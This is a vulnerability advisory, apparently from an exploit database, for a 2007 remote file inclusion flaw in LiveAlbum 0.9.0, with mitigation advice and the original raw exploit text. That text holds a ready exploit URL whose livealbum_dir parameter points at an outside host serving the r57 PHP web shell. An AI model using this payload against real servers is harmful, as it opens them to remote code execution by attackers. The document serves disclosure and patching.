LiveAlbum 0.9.0 Remote File Inclusion Vulnerability

vendor:

LiveAlbum

by:

S.W.A.T.

7.5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: LiveAlbum

Affected Version From: 0.9.0

Affected Version To: 0.9.0

Patch Exists: YES

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

LiveAlbum 0.9.0 Remote File Inclusion Vulnerability

The LiveAlbum 0.9.0 application is vulnerable to remote file inclusion. An attacker can exploit this vulnerability by injecting a malicious URL in the livealbum_dir parameter in the common.php file, which allows them to include and execute remote files, potentially leading to arbitrary code execution.

Mitigation:

The vendor has released a patch for this vulnerability. Users are advised to update to LiveAlbum version 0.9.1 or later to mitigate this issue.

Source

Exploit-DB raw data:

                      \\\|///
                    \\  - -  //      Xmors Underground Group
                     (  @ @ )
              ----oOOo--(_)-oOOo--------------------------------------------------
              Portal   :  LiveAlbum 0.9.0
              Download :  http://downloads.sourceforge.net/livealbum/livealbum-0.9.1.tar.bz2
	      Author   :  S.W.A.T.
	      HomePage :  wWw.XmorS.CoM
	      Type     :  Remote File Inclusion
              ----ooooO-----Ooooo--------------------------------------------------
                  (   )     (   )
                   \ (       ) /
                    \_)     (_/



+---------------------------------------------------------------------------------------------+

Vuln :

http://[TARGET]/[PATH]/common.php?livealbum_dir=http://xmors.by.ry/r57.php?


+---------------------------------------------------------------------------------------------+

# milw0rm.com [2007-10-08]